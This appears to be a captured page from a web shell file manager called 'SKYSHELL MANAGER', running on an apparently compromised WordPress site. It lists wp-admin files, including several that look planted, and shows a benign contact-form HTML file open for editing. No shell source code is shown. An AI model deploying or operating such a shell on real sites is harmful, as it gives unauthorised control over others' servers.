📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: contact.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Contact Us</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet"> <style> * { margin: 0; padding: 0; box-sizing: border-box; font-family: Arial, sans-serif; } body { background: linear-gradient(135deg, #abbaff, #ffffff); display: flex; justify-content: center; align-items: center; min-height: 100vh; } .contact-container { background: #fff; width: 95%; padding: 40px 50px; border-radius: 12px; box-shadow: 0 15px 40px rgba(0,0,0,0.2); } .contact-container h2 { text-align: center; margin-bottom: 25px; color: #333; } .input-group { margin-bottom: 18px; } .input-group label { display: block; margin-bottom: 6px; color: #444; } .input-group input, .input-group textarea { width: 100%; padding: 12px; border-radius: 6px; border: 1px solid #ccc; outline: none; transition: 0.3s; font-size: 14px; } .input-group input:focus, .input-group textarea:focus { border-color: #667eea; box-shadow: 0 0 5px rgba(102,126,234,0.5); } textarea { resize: none; height: 120px; } button { width: 100%; padding: 14px; border: none; border-radius: 6px; background: #d27506; color: white; font-size: 16px; cursor: pointer; transition: 0.3s; } button:hover { background: #7f4500; } .success-message { display: none; margin-top: 15px; padding: 12px; color: #155724; border-radius: 6px; text-align: center; } .logo{text-align: center;} @media (max-width: 480px) { .contact-container { padding: 25px 20px; } } </style> </head> <body> <div class="container py-5 contact-container"> <div class="row"> <div class="col-md-6"> <div class=""> <div class="logo"> <img src="https://velvetskinny.com/wp-content/uploads/2025/02/cropped-logo121-1.png"></div> <h2>Contact Us</h2> <form id="contactForm"> <div class="input-group"> <label>Name</label> <input type="text" required> </div> <div class="input-group"> <label>Email</label> <input type="email" required> </div> <div class="input-group"> <label>Phone</label> <input type="tel" required> </div> <div class="input-group"> <label>Subject</label> <input type="text" required> </div> <div class="input-group"> <label>Message</label> <textarea required></textarea> </div> <button type="submit">Send Message</button> </form> <div class="success-message" id="successMsg"> Your message has been sent successfully! </div> </div> </div> <div class="col-md-6"> </div> </div> </div> <script> document.getElementById("contactForm").addEventListener("submit", function(e){ e.preventDefault(); // Show success message document.getElementById("successMsg").style.display = "block"; // Reset form this.reset(); }); </script> </body> </html>
Save